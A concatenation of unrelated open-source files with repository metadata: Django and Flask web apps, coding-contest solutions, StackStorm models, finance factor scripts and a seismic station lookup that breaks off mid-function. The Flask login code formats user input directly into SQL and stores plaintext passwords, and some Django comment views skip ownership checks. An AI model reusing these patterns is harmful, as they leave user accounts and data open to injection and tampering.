] | permissive | darwinharianto/annotation_utils | 598b043345790580e99f34f159b9612b9b1bcd52 | 1cbdadaa28ff945e705dd7b806dda395e32ab23c | refs/heads/master | 2022-04-27T01:20:10.738778 | 2020-04-27T09:23:57 | 2020-04-27T09:23:57 | 255,525,300 | 0 | 0 | MIT | 2020-04-27T09:23:59 | 2020-04-14T06:10:57 | Python | UTF-8 | Python | false | false | 101 | py | from .ann import LabelmeShape, LabelmeShapeHandler, LabelmeAnnotation, \
LabelmeAnnotationHandler | [
"mork.clayton3@gmail.com"
] | mork.clayton3@gmail.com |
1c146007bdbbf771119232ee15090e4223ebdda3 | de40d3fa8d8af0030556d27d6833f6a1a0e7700c | /baekjoon/10409py/a.py | 496a9142bc65445a4c3f00ba64a3aab3aec0e196 | [] | no_license | NeoMindStd/CodingLife | cd6a627209c0353f4855f09fd5dfef8da4bbfef6 | bcb6c3752f472e6a4f3b8f158d02bc3599dfcda3 | refs/heads/master | 2022-12-24T10:42:45.390085 | 2022-12-11T16:27:16 | 2022-12-11T16:27:16 | 191,797,634 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | n,T=map(int,input().split())
l=list(map(int,input().split()))
s=i=0
while i<n:
s+=l[i]
if s>T:break
i+=1
print(i)
| [
"dwj1996@naver.com"
] | dwj1996@naver.com |
f1e3f05aa54d6e7d9bf3c2192cdfe8839adb3607 | e2f0587c7949d71bf432d31b2460d4bd2a200961 | /MixedDjango/clonecodding/instagram/views.py | 43a3e63a00cb8c10e6365cd8a5a203fc7b9e3825 | [] | no_license | NGG-kang/DjangoReview | 91c92dbf0d8da6a4179844cf788ca8c731434860 | c6338dfa643d73dbfb4fcdafe53a7997ca253f3a | refs/heads/main | 2023-04-21T06:32:28.109349 | 2021-05-23T09:41:44 | 2021-05-23T09:41:44 | 342,759,741 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,155 | py | import json
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Q
from django.http import HttpResponse
from django.shortcuts import render, get_object_or_404, redirect, resolve_url
from django.views.generic import ListView, UpdateView, CreateView, DetailView, DeleteView
from django.contrib import messages
from rest_framework.filters import SearchFilter, OrderingFilter
from rest_framework.renderers import TemplateHTMLRenderer
from .models import Post, Comment
from .forms import PostForm, CommentForm
from django.urls import reverse, reverse_lazy
from django.contrib.auth import get_user_model
# 함수기반
# def post_list(request):
# post_list = Post.objects.filter(author=request.user)
#
#
# return render(request, 'instagram/post_list.html', {
# 'post_list': post_list
# })
#
# def post_create(request):
# form = PostForm(request.POST, request.FILES)
# pass
#
# def post_modify(request, pk):
# pass
#
# def post_delete(request, pk):
# pass
class PostListView(ListView):
# def get_queryset(self):
# get_queryset의 다음에 페이지네이터가 구현되어 있어서 paginate_by를 쓸 수 있다
# if not self.request.user.is_anonymous:
# self.queryset = Post.objects.filter(author=self.request.user)
# if not self.queryset:
# self.queryset = None
# return self.queryset
def get(self, request, *args, **kwargs):
if not request.user.is_anonymous:
qs = Post.objects.all() \
.filter(
Q(author__in=request.user.following_set.all()) |
Q(author=request.user)
)
if qs:
paginator, page, queryset, is_paginated = super().paginate_queryset(qs, 9)
context = {
'paginator': paginator,
'page': page,
'is_paginated': is_paginated,
'post_list': queryset,
}
return render(request, 'instagram/post_list.html', context)
return render(request, 'instagram/post_list.html', {
'post_list': None
})
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
form_class = PostForm
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.author = self.request.user
messages.success(self.request, '포스팅 저장 완료')
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UpdateView):
model = Post
form_class = PostForm
def get(self, request, *args, **kwargs):
self.object = get_object_or_404(Post, pk=kwargs['pk'])
if self.object.author != request.user:
messages.warning(self.request, '작성한 회원만 수정할 수 있습니다')
return redirect(self.object)
form = PostForm
return super(PostUpdateView, self).get(form)
def form_valid(self, form):
self.object = form.save(commit=False)
if self.object.author == self.request.user:
messages.success(self.request, '포스팅 수정 완료')
form.save()
else:
messages.warning(self.request, '작성한 회원만 수정할 수 있습니다')
return super().form_valid(form)
class PostDeleteView(LoginRequiredMixin, DeleteView):
model = Post
template_name_suffix = '_delete'
success_url = 'instagram/post_list.html'
def get(self, request, *args, **kwargs):
self.object = get_object_or_404(Post, pk=kwargs['pk'])
if self.object.author != request.user:
messages.warning(self.request, '작성한 회원만 삭제할수 있습니다')
return redirect(self.object)
return super(PostDeleteView, self).get(Post)
def post(self, request, *args, **kwargs):
self.object = get_object_or_404(Post, pk=kwargs['pk'])
if self.object.author != request.user:
messages.warning(self.request, '작성한 회원만 삭제할수 있습니다')
return redirect(self.object)
self.object.delete()
messages.success(request, '포스팅 삭제 완료')
return redirect('instagram:post_list')
class PostDetailView(DetailView):
model = Post
def get_context_data(self, **kwargs):
comment_list = Comment.objects.filter(post=kwargs.get('object'))
comment_form = CommentForm()
context = {
'comment_list': comment_list,
'form': comment_form
}
return super().get_context_data(**context)
def post(self, request, **kwargs):
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.author = request.user
comment.post = super().get_object()
comment.save()
return redirect('instagram:post_detail', pk=kwargs.get('pk'))
def get(self, request, *args, **kwargs):
pk = request.GET.get('pk', '')
if pk:
comment = Comment.objects.get(pk=pk)
if comment.author != request.user:
messages.warning(request, message="작성자가 아닙니다")
return
self.object = self.get_object()
initial_dict = {
"comment": comment.comment,
"author": comment.author,
"post": comment.post,
}
form = CommentForm(request.POST or None, initial=initial_dict)
self.object = self.get_object()
context = self.get_context_data(object=self.object)
context["comment_edit_form"] = form
context["comment_pk"] = comment.pk
return self.render_to_response(context)
# return render(request, "instagram/form.html", {
# "comment_edit_form": comment_edit_form,
# "comment_message": comment.comment
# })
else:
self.object = self.get_object()
context = self.get_context_data(object=self.object)
return self.render_to_response(context)
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.author = request.user
comment.post = post
comment.save()
return redirect('instagram:post_detail', pk=pk)
else:
comment_list = Comment.objects.filter(post=pk)
comment_form = CommentForm()
return render(request, 'instagram/post_detail.html', {
'post': post,
'form': comment_form,
'comment_list': comment_list,
})
def post_like(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.user==post.author:
messages.warning(request, "작성한 회원은 좋아요를 누를수 없습니다")
return redirect('instagram:post_detail', pk=pk)
post.like_user.add(request.user)
messages.success(request, f"{post.author} 좋아요")
redirect_url = request.META.get("HTTP_REFERER", "root")
return redirect(redirect_url)
def post_unlike(request, pk):
post = get_object_or_404(Post, pk=pk)
post.like_user.remove(request.user)
messages.success(request, f"{post.author} 좋아요 취소")
redirect_url = request.META.get("HTTP_REFERER", "root")
return redirect(redirect_url)
def comment_delete(request, pk, comment_pk):
comment = get_object_or_404(Comment, pk=comment_pk)
comment.delete()
return redirect('instagram:post_detail', pk=pk)
def comment_edit(request, pk, comment_pk):
comment = get_object_or_404(Comment, pk=comment_pk)
form = CommentForm(request.POST or None,
instance=comment)
if request.method == 'POST':
if form.is_valid():
comment_form = form.save(commit=False)
comment_form.comment = request.POST.get("comment")
comment_form.save()
return redirect('instagram:post_detail', pk=pk)
# 함수기반
# @login_required
# def post_delete(request, pk):
# model = Post
# post = get_object_or_404(model, pk=pk)
# if post.author == request.user:
# messages.warning(request, '정말 삭제 하시겠습니까?')
# if request.method == 'POST':
# post.delete()
# messages.success(request, '포스팅 삭제 완료')
# return redirect('instagram:post_list')
# else:
# messages.warning(request, '작성한 회원만 삭제할 수 있습니다')
# return redirect(post)
# return render(request, 'instagram/post_delete.html', {
# })
post_create = PostCreateView.as_view()
post_update = PostUpdateView.as_view()
post_list = PostListView.as_view()
post_delete = PostDeleteView.as_view()
#######################################
from rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet
from .serializers import PostSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.generics import RetrieveAPIView
from rest_framework.decorators import api_view, action
from rest_framework.permissions import IsAuthenticated
from .permissions import IsAuthorOrReadonly
class PostViewSet(ModelViewSet):
queryset = Post.objects.all()
serializer_class = PostSerializer
permission_classes = [IsAuthenticated, IsAuthorOrReadonly]
filter_backends = [SearchFilter, OrderingFilter]
search_fields=['message']
ordering=['id']
@action(detail=False, methods=['GET'])
def message(self, request):
qs = self.get_queryset().filter(message__startswith='1')
serializer = self.get_serializer(qs, many=True)
return Response(serializer.data)
@action(detail=True, methods=['PATCH'])
def message_set(self, request, pk):
instance = self.get_object()
instance.message = '바뀜'
instance.save(update_fields=['message'])
serializer = self.get_serializer(instance)
return Response(serializer.data)
# class PostAPIView(generics.ListAPIView):
# queryset = Post.objects.all()
# serializer_class = PostSerializer
#
#
# class PostListAPIView(APIView):
# def get(self, request):
# qs = Post.objects.all()
# serializer = PostSerializer(qs, many=True)
# return Response(serializer.data)
#
# @api_view(['GET'])
# def post_api_view2(request):
# qs = Post.objects.all()
# serializer = PostSerializer(qs, many=True)
# return Response(serializer.data)
class PostDetailAPIView(RetrieveAPIView):
queryset = Post.objects.all()
renderer_classes = [TemplateHTMLRenderer]
template_name='instagram/mypost.html'
def get(self, request, *args, **kwargs):
post = self.get_object()
return Response({
'post': PostSerializer(post).data
}) | [
"skarndrkd1222@gmail.com"
] | skarndrkd1222@gmail.com |
63c7e6fe54ba6dae4f1797752b42b55890887057 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02409/s766823066.py | 34c864d987f1742566592d17da40546e50f9c4f4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | n = int(input())
list = [[[0 for i in range(10)] for j in range(3)] for k in range(4)]
for i in range(n):
a,b,c,d = [int(j) for j in input().split()]
list[a-1][b-1][c-1] += d
for i in range(4):
for j in range(3):
for k in range(10):
print(" {0}".format(list[i][j][k]),end='')
print()
if i != 3:
print("####################") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
6e33e1d8b5d3c083c46e467a888d86fe4a21f45d | cc2fcc1a0c5ea9789f98ec97614d7b25b03ba101 | /st2common/st2common/models/db/execution.py | dcc363b0feb7a0410be85b1d1b8636dc23afc808 | [
"Apache-2.0"
] | permissive | Junsheng-Wu/st2 | 6451808da7de84798641882ca202c3d1688f8ba8 | c3cdf657f7008095f3c68b4132b9fe76d2f52d81 | refs/heads/master | 2022-04-30T21:32:44.039258 | 2020-03-03T07:03:57 | 2020-03-03T07:03:57 | 244,301,363 | 0 | 0 | Apache-2.0 | 2022-03-29T22:04:26 | 2020-03-02T06:53:58 | Python | UTF-8 | Python | false | false | 7,432 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import mongoengine as me
from st2common import log as logging
from st2common.models.db import stormbase
from st2common.fields import ComplexDateTimeField
from st2common.util import date as date_utils
from st2common.util.secrets import get_secret_parameters
from st2common.util.secrets import mask_inquiry_response
from st2common.util.secrets import mask_secret_parameters
from st2common.constants.types import ResourceType
__all__ = [
'ActionExecutionDB',
'ActionExecutionOutputDB'
]
LOG = logging.getLogger(__name__)
class ActionExecutionDB(stormbase.StormFoundationDB):
RESOURCE_TYPE = ResourceType.EXECUTION
UID_FIELDS = ['id']
trigger = stormbase.EscapedDictField()
trigger_type = stormbase.EscapedDictField()
trigger_instance = stormbase.EscapedDictField()
rule = stormbase.EscapedDictField()
action = stormbase.EscapedDictField(required=True)
runner = stormbase.EscapedDictField(required=True)
# Only the diff between the liveaction type and what is replicated
# in the ActionExecutionDB object.
liveaction = stormbase.EscapedDictField(required=True)
status = me.StringField(
required=True,
help_text='The current status of the liveaction.')
start_timestamp = ComplexDateTimeField(
default=date_utils.get_datetime_utc_now,
help_text='The timestamp when the liveaction was created.')
end_timestamp = ComplexDateTimeField(
help_text='The timestamp when the liveaction has finished.')
parameters = stormbase.EscapedDynamicField(
default={},
help_text='The key-value pairs passed as to the action runner & action.')
result = stormbase.EscapedDynamicField(
default={},
help_text='Action defined result.')
context = me.DictField(
default={},
help_text='Contextual information on the action execution.')
parent = me.StringField()
children = me.ListField(field=me.StringField())
log = me.ListField(field=me.DictField())
# Do not use URLField for web_url. If host doesn't have FQDN set, URLField validation blows.
web_url = me.StringField(required=False)
meta = {
'indexes': [
{'fields': ['rule.ref']},
{'fields': ['action.ref']},
{'fields': ['liveaction.id']},
{'fields': ['start_timestamp']},
{'fields': ['end_timestamp']},
{'fields': ['status']},
{'fields': ['parent']},
{'fields': ['rule.name']},
{'fields': ['runner.name']},
{'fields': ['trigger.name']},
{'fields': ['trigger_type.name']},
{'fields': ['trigger_instance.id']},
{'fields': ['context.user']},
{'fields': ['-start_timestamp', 'action.ref', 'status']}
]
}
def get_uid(self):
# TODO Construct od from non id field:
uid = [self.RESOURCE_TYPE, str(self.id)]
return ':'.join(uid)
def mask_secrets(self, value):
result = copy.deepcopy(value)
liveaction = result['liveaction']
parameters = {}
# pylint: disable=no-member
parameters.update(value.get('action', {}).get('parameters', {}))
parameters.update(value.get('runner', {}).get('runner_parameters', {}))
secret_parameters = get_secret_parameters(parameters=parameters)
result['parameters'] = mask_secret_parameters(parameters=result['parameters'],
secret_parameters=secret_parameters)
if 'parameters' in liveaction:
liveaction['parameters'] = mask_secret_parameters(parameters=liveaction['parameters'],
secret_parameters=secret_parameters)
if liveaction.get('action', '') == 'st2.inquiry.respond':
# Special case to mask parameters for `st2.inquiry.respond` action
# In this case, this execution is just a plain python action, not
# an inquiry, so we don't natively have a handle on the response
# schema.
#
# To prevent leakage, we can just mask all response fields.
result['parameters']['response'] = mask_secret_parameters(
parameters=liveaction['parameters']['response'],
secret_parameters=[p for p in liveaction['parameters']['response']]
)
# TODO(mierdin): This logic should be moved to the dedicated Inquiry
# data model once it exists.
if self.runner.get('name') == "inquirer":
schema = result['result'].get('schema', {})
response = result['result'].get('response', {})
# We can only mask response secrets if response and schema exist and are
# not empty
if response and schema:
result['result']['response'] = mask_inquiry_response(response, schema)
return result
def get_masked_parameters(self):
"""
Retrieve parameters with the secrets masked.
:rtype: ``dict``
"""
serializable_dict = self.to_serializable_dict(mask_secrets=True)
return serializable_dict['parameters']
class ActionExecutionOutputDB(stormbase.StormFoundationDB):
"""
Stores output of a particular execution.
New document is inserted dynamically when a new chunk / line is received which means you can
simulate tail behavior by periodically reading from this collection.
Attribute:
execution_id: ID of the execution to which this output belongs.
action_ref: Parent action reference.
runner_ref: Parent action runner reference.
timestamp: Timestamp when this output has been produced / received.
output_type: Type of the output (e.g. stdout, stderr, output)
data: Actual output data. This could either be line, chunk or similar, depending on the
runner.
"""
execution_id = me.StringField(required=True)
action_ref = me.StringField(required=True)
runner_ref = me.StringField(required=True)
timestamp = ComplexDateTimeField(required=True, default=date_utils.get_datetime_utc_now)
output_type = me.StringField(required=True, default='output')
data = me.StringField()
meta = {
'indexes': [
{'fields': ['execution_id']},
{'fields': ['action_ref']},
{'fields': ['runner_ref']},
{'fields': ['timestamp']},
{'fields': ['output_type']}
]
}
MODELS = [ActionExecutionDB, ActionExecutionOutputDB]
| [
"wei.ying@easystack.cn"
] | wei.ying@easystack.cn |
423385b7603bb326c76dd43a32df2f7a1505d221 | 589b5eedb71d83c15d44fedf60c8075542324370 | /project/stock_project/barra_risk_model/barra_factor/cal_factor_barra_leverage.py | 17358e48ac842ad352fcf71dc23fe7800a3a6799 | [] | no_license | rlcjj/quant | 4c2be8a8686679ceb675660cb37fad554230e0d4 | c07e8f0f6e1580ae29c78c1998a53774a15a67e1 | refs/heads/master | 2020-03-31T07:15:48.111511 | 2018-08-27T05:29:00 | 2018-08-27T05:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | def cal_factor_barra_leverage_market_leverage():
name = 'TotalLiabilityDaily'
total_debt = get_h5_data(name)
name = 'TotalAssetDaily'
total_asset = get_h5_data(name)
debt_to_asset = total_debt.div(total_asset)
debt_to_asset = debt_to_asset.dropna(how='all')
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\raw_data\\'
debt_to_asset.to_csv(out_path + 'RAW_CNE5_LEVERAGE_MARKET_LEVERAGE.csv')
debt_to_asset = remove_extreme_value_mad_pandas(debt_to_asset)
debt_to_asset = normal_pandas(debt_to_asset)
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\standardization_data\\'
debt_to_asset.to_csv(out_path + 'NORMAL_CNE5_LEVERAGE_MARKET_LEVERAGE.csv')
def cal_factor_barra_leverage():
name = 'NORMAL_CNE5_LEVERAGE_MARKET_LEVERAGE'
leverage = get_barra_standard_data(name)
leverage = leverage.dropna(how='all')
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\raw_data\\'
leverage.to_csv(out_path + 'RAW_CNE5_LEVERAGE.csv')
leverage = remove_extreme_value_mad_pandas(leverage)
leverage = normal_pandas(leverage)
out_path = 'E:\\4_代码\\pycharmprojects\\2_风险模型BARRA\\data\\barra_data\\standardization_data\\'
leverage.to_csv(out_path + 'NORMAL_CNE5_LEVERAGE.csv')
if __name__ == '__main__':
cal_factor_barra_leverage_market_leverage()
cal_factor_barra_leverage()
| [
"1119332482@qq.com"
] | 1119332482@qq.com |
dfffd665730509eb19be752fae578c6918d50252 | 002b18b4e66d7536ce8538f65edcb0cf17472bf7 | /liaoxuefeng/webframework/app2.py | 146d43b72ca6e0bd9c5785af52b29a650d58b0a1 | [] | no_license | yslatgit/test-ysl | 987b6026ddd74c88bb81b41ce12e43733c458cb1 | c1a8858a8ad346913131c3bd9fb8ae8ea84c36a7 | refs/heads/master | 2020-04-10T15:16:55.898370 | 2018-12-21T06:51:09 | 2018-12-21T06:51:09 | 161,104,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | from flask import Flask, request, render_template
import os, sqlite3
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def homeMeth():
return render_template('home.html')
@app.route('/login', methods=['POST'])
def loginMeth():
username = request.form['username']
password = request.form['password']
msg = dealInfo(username, password, 1)
if msg == True:
return render_template('login.html')
else:
return render_template('home.html', message = msg)
@app.route('/success', methods=['POST'])
def successMeth():
username = request.form['username']
password = request.form['password']
msg = dealInfo(username, password, 2)
if msg == True:
return render_template('success.html')
else:
return render_template('login.html', message = msg)
# type:1:保存 2:查询
def dealInfo(name, pwd, type):
msg = ""
print(name, pwd, type)
# 没有则建立数据库文件,有则建立连接
db_file = os.path.join(os.path.dirname(__file__), 'dbdb.db')
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
# 获取该数据库下的所有表名
a = "select name from sqlite_master where type = 'table'"
cursor.execute(a)
tableNames = cursor.fetchall()
# 若无表,则新建表格'user'
if tableNames:
pass
else:
cursor.execute('create table user(username VARCHAR(20), password VARCHAR(20))')
# 判断用户名和密码是否为空
if name == '' or pwd == '':
return "用户名和密码不能为空"
# 查询该表格下是否有该条数据
cursor.execute("select * from user WHERE username = '%s'" %name)
values = cursor.fetchall()
if values:
for value in values:
if value[0] == name:
if type == 1:
cursor.close()
conn.close()
return "该用户名已存在,请重填注册信息。。。"
elif type == 2 and value[1] == pwd: # 信息一致,登录成功
cursor.close()
conn.close()
return True
msg = "密码错误,请重新输入"
else: # 没有查询到数据
if type == 1: # 信息保存成功,可以进行登录操作
cursor.execute("insert into user VALUES ('%s', '%s')" %(name, pwd))
cursor.close()
conn.commit()
conn.close()
return True
else:
msg = '没有此用户名信息,请核对。。。'
cursor.close()
conn.close()
return msg
if __name__ == '__main__':
app.run() | [
"986725816@qq.com"
] | 986725816@qq.com |
fe70e24316ee8a47560b7e331c0a5d8d453646d4 | 88849505c8d71c5fcc8d18fe2da3aa93a97f1e0e | /cupt/screen.py | 7e2100412973869b68b09de2b05d22f16142cf6c | [
"MIT"
] | permissive | mscroggs/KLBFAX | 5322e025c41b30c6f160699e742c988c9e47ea88 | 3aaaa0cfe3b9772caa0a87e639efd9bce5b6adf4 | refs/heads/master | 2021-04-09T16:38:08.581934 | 2018-06-25T12:18:23 | 2018-06-25T12:18:26 | 31,314,664 | 5 | 1 | null | 2017-07-26T19:21:13 | 2015-02-25T13:26:38 | Python | UTF-8 | Python | false | false | 830 | py | import curses
import config
from .cupt import CuPT
class Screen:
def __enter__(self):
import locale
locale.setlocale(locale.LC_ALL,"")
self.scr = curses.initscr()
self.cupt = CuPT(self.scr)
curses.start_color()
curses.use_default_colors()
curses.noecho()
curses.cbreak()
self.old = curses.curs_set(0)
self.scr.keypad(1)
curses.resizeterm(config.HEIGHT,config.WIDTH)
self.scr.refresh()
return self
def getch(self):
return self.scr.getch()
def __exit__(self,a,b,c):
curses.nocbreak()
curses.curs_set(self.old)
self.scr.keypad(0)
curses.echo()
curses.endwin()
class DummyScreen:
def __init__(self):
self.scr = None
self.cupt = CuPT(self.scr)
| [
"matthew.w.scroggs@gmail.com"
] | matthew.w.scroggs@gmail.com |
959ec00f00a0cf6fe78fac46268a67bebfb445ef | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03565/s875696871.py | 6fdbfc635ad33e71b8d47334616f309ffe409d41 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | s = input()
T = input()
n_s = len(s)
n_t = len(T)
S = ""
for i in range(n_s-n_t+1):
s_i = s[i:n_t+i]
flag = True
for j in range(n_t):
if s_i[j] != "?":
if s_i[j] != T[j]:
break
else:
S = s[:i] + T + s[n_t+i:]
#print(S)
if S == "":
print("UNRESTORABLE")
exit()
S = list(S)
for i in range(n_s):
if S[i] == "?":
S[i] = "a"
print("".join(S))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c05430eb373a57834315638dedc9649acbcc0526 | df5b1caed735947b3cf6f4cdf46f3141ba9e2c5c | /boot3.spec | f7516251ea56958c76f03542e6131ca2e7dbd8d7 | [] | no_license | hcferreira-git/RDM | 33b303469ca0230ac1a0a82e74ba5c4fbe894837 | e53972cab2d416bbf44bb9c874d8d91d82b7d074 | refs/heads/master | 2021-03-31T16:36:29.549303 | 2020-04-18T16:14:59 | 2020-04-18T16:14:59 | 248,119,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['boot3.py'],
pathex=['C:\\Users\\Henrique\\Desktop\\bootzap'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='boot3',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True )
| [
"="
] | = |
ff55eaec085d49b9f5eb03937b64b571bd46a4f2 | 5b593bc4d1c90ea85eb9912eeb3977269977b46b | /bin/django-admin | 7eff524b82cc60403d52b91169c8ddf082a7199c | [] | no_license | monetree/djangular | b17ef12bc08d33676fe0e7fc865e2ba5bc4cc36e | abd5b714ab1276061f3ee7f3685eb0f198b8326b | refs/heads/master | 2020-03-16T07:39:17.557622 | 2018-05-10T09:09:58 | 2018-05-10T09:09:58 | 132,580,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | #!/home/soubhagya/Desktop/django/angular/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
| [
"soubhagyakumar666@gmail.com"
] | soubhagyakumar666@gmail.com | |
f606a00512bc29ccfe2df949a965f936047364f3 | 49d8827695d1fa9076467fd1ec2e26afcf56e2dc | /mloc.py | 850abda4ff754f6d4bf76e3b5f6fb2b518135018 | [] | no_license | mhearne-usgs/comcatloader | 8eb8c2214915b13403b35f5b6a991ce9fb67090c | 35f00d33356f72484ffc5be1bdd7a9c2e7a3c090 | refs/heads/master | 2020-04-01T16:46:47.101082 | 2016-02-05T15:54:06 | 2016-02-05T15:54:06 | 9,404,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,860 | py | #!/usr/bin/env python
#stdlib imports
import sys
import os.path
from datetime import datetime,timedelta
import re
import socket
import string
import argparse
import textwrap
import math
from collections import OrderedDict
import urllib2
import json
#local imports
from neicio.tag import Tag
CWBHOST = 'cwbpub.cr.usgs.gov'
CWBPORT = 2052
MINMAG = 4.0
URLBASE = 'http://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=[START]&endtime=[END]&latitude=[LAT]&longitude=[LON]&maxradiuskm=[RAD]'
RADIUS = 10 #km around an epicenter to search for matching earthquake
TIMEDELTA = 3 #seconds around an origin time to search for matching earthquake
SOURCE = 'rde'
TIMERROR = 5 #how many days can the phase time be from a given station epoch before we don't consider it to be part of that epoch
TIMEFMT = '%Y-%m-%dT%H:%M:%S'
USAGE = {'+':1,'x':0,'-':0}
DEPTHTYPES = {'c':'operator assigned',
'd':'constrained by depth phases',
'e':'other',
'f':'other',
'l':'constrained by direct phases',
'm':'from location',
'n':'constrained by direct phases',
'r':'from location',
'u':'other',
'w':'from moment tensor inversion'}
class StationTranslator(object):
def __init__(self,dictionaryfile=None):
self.stationdict = {}
if dictionaryfile is not None:
f = open(dictionaryfile,'rt')
for line in f.readlines():
key,value = line.split('=')
self.stationdict[key.strip()] = value.strip()
f.close()
def save(self,dictfile):
f = open(dictfile,'wt')
for key,value in self.stationdict.iteritems():
f.write('%s = %s\n' % (key.strip(),value.strip()))
f.close()
def callCWBServer(self,req):
response = ''
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0)
s.connect((CWBHOST,CWBPORT))
s.send(req)
while True:
tresp = s.recv(10241)
response += tresp
if response.find('<EOR>') > -1:
break
s.close()
except Exception,msg:
try:
time.sleep(2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0)
s.connect((CWBHOST,CWBPORT))
s.send(req)
response = s.recv(10241)
s.close()
except:
pass
return response
def getStationEpoch(self,station,phasetime):
req = '-c c -s ..%s -b all \n' % station
pad = chr(0) * (80 - len(req))
req = str(req + pad)
response = self.callCWBServer(req)
lines = response.split('\n')
epochs = []
for line in lines:
parts = line.split()
if len(parts) < 9:
continue
datestr1 = parts[10]
timestr1 = parts[11]+':00'
datestr2 = parts[13]
timestr2 = parts[14]+':00'
t1 = datetime.strptime(datestr1 + ' ' + timestr1,'%Y-%m-%d %H:%M:%S')
t2 = datetime.strptime(datestr2 + ' ' + timestr2,'%Y-%m-%d %H:%M:%S')
epochs.append((t1,t2))
etime = None
for epoch in epochs:
t1,t2 = epoch
if phasetime > t1 - timedelta(seconds=86400*TIMERROR) and phasetime < t2 + timedelta(seconds=86400*TIMERROR):
dt = t2-t1
nseconds = dt.days*86400 + dt.seconds
etime = t1 + timedelta(seconds=nseconds/2)
if etime > datetime.utcnow():
etime = phasetime
else:
pass
break
return etime
def getIR(self,station):
req = '-b all -a *.*.%s -c c \n' % station
pad = chr(0) * (80 - len(req))
req = str(req + pad)
response = self.callCWBServer(req)
lines = response.split('\n')
nscl = station
for line in lines:
parts = line.split(':')
if len(parts) < 2:
continue
f,d,s,n = parts[0].split('.')
if f.lower() not in ['isc','iris']:
continue
nscl = '%s.%s..' % (d,s)
break
return nscl
def getFSDN(self,station):
req = '-c c -a FDSN.IR.%s -c c \n' % station
pad = chr(0) * (80 - len(req))
req = str(req + pad)
response = self.callCWBServer(req)
lines = response.split('\n')
fsdn = station
for line in lines:
parts = line.split(':')
if len(parts) < 2:
continue
parts = parts[0].split('.')
if len(parts) < 2:
continue
if parts[2] != station:
continue
fsdn = '%s.%s..' % (parts[1],parts[2])
break
return fsdn
def getNSCL(self,station,phasetype,phasetime):
stationkey = station+'-'+phasetype[0:1]
if self.stationdict.has_key(stationkey):
#sys.stderr.write('Using cached station key %s\n' % stationkey)
return self.stationdict[stationkey]
dt = timedelta(seconds=86400)
preferred = station
epoch = self.getStationEpoch(station,phasetime) #get a date where valid metadata is available
if epoch is not None:
timestr = (epoch+dt).strftime('%Y/%m/%d')
okchannels = ['HH','BH','SH','HN']
scode = '..%s' % (station)
req = '-c c -s %s -b %s \n' % (scode,timestr)
pad = chr(0) * (80 - len(req))
req = str(req + pad)
response = self.callCWBServer(req)
lines = response.split('\n')
